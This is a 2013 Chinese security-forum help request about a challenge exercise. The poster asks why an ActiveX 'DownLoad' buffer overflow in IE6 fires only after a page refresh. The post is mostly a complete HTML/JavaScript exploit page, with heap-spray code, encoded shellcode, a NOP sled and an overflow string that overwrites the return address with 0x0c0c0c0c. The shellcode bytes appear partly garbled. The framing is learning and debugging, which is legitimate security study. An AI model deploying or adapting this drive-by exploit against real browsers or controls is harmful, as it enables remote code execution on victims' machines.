[求助]DownLoad溢出为什么需要刷新一下才能触发-二进制漏洞-看雪-安全社区|安全招聘|kanxue.com

[求助]DownLoad溢出为什么需要刷新一下才能触发

发表于: 2013-8-7 15:36 2565

[求助]DownLoad溢出为什么需要刷新一下才能触发

idhyt

2013-8-7 15:36

2565

新手第一次问问题，好激动，怎么才能表现出经常问问题的样子。。。

今天没事做了下2008年看雪的两个Explorer题，第二个题fuzz控件DownLoad存在溢出。
Sub DownLoad (
ByVal URL As String ,
ByVal filename As String
)

最后写个html页面，IE6打开时候不会崩，刷新一下才可以触发，这是什么问题。
前边加上堆喷代码打开时候堆喷能够成功，但是不能触发
刷新一下能触发，但是堆喷的东西已经没有了，请问，这是什么问题。。。

代码：

<html>
<object classid="clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2" id='target'></object>
<body> 
<SCRIPT language="javascript">
var shellcode = unescape("%u68FC੪Ḹ捨톉桏琲಑纍㏴럛⬄曣㎻匲畨敳呲툳譤ず䮋謌᱉ঋ榋괈樽㠊甞锅埿闸譠㱅䲋砅촃妋̠㏝䟿㒋λ駵븏㨆瓄섈ߊ퀃㯱⑔甜诤⑙���警笼妋̜ϝ묬徕垫㵡੪Ḹꥵ���桓楯ⅴ敨灸譬叄偐ｓﱗｓ"); 
var nops = unescape("邐邐");
while (nops.length < 0x100000) nops += nops;
nops=nops.substring(0,0x100000/2-32/2-4/2-2/2-shellcode.length);
nops=nops+shellcode;
var memory = new Array();
for (var i=0;i<200;i++) memory[i] += nops;

var arg1 = '';
while (arg1.length < 0x2ac) arg1+="\x41\x41\x41\x41"; 
arg1+="\x0c\x0c\x0c\x0c";
var arg2 = "defaultV";
target.DownLoad(arg1,arg2);

</script>
</body>
</html>

DLL传不上，链接http://bbs.pediy.com/showthread.php?t=57317
B题

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课

收藏・0

免费・0

支持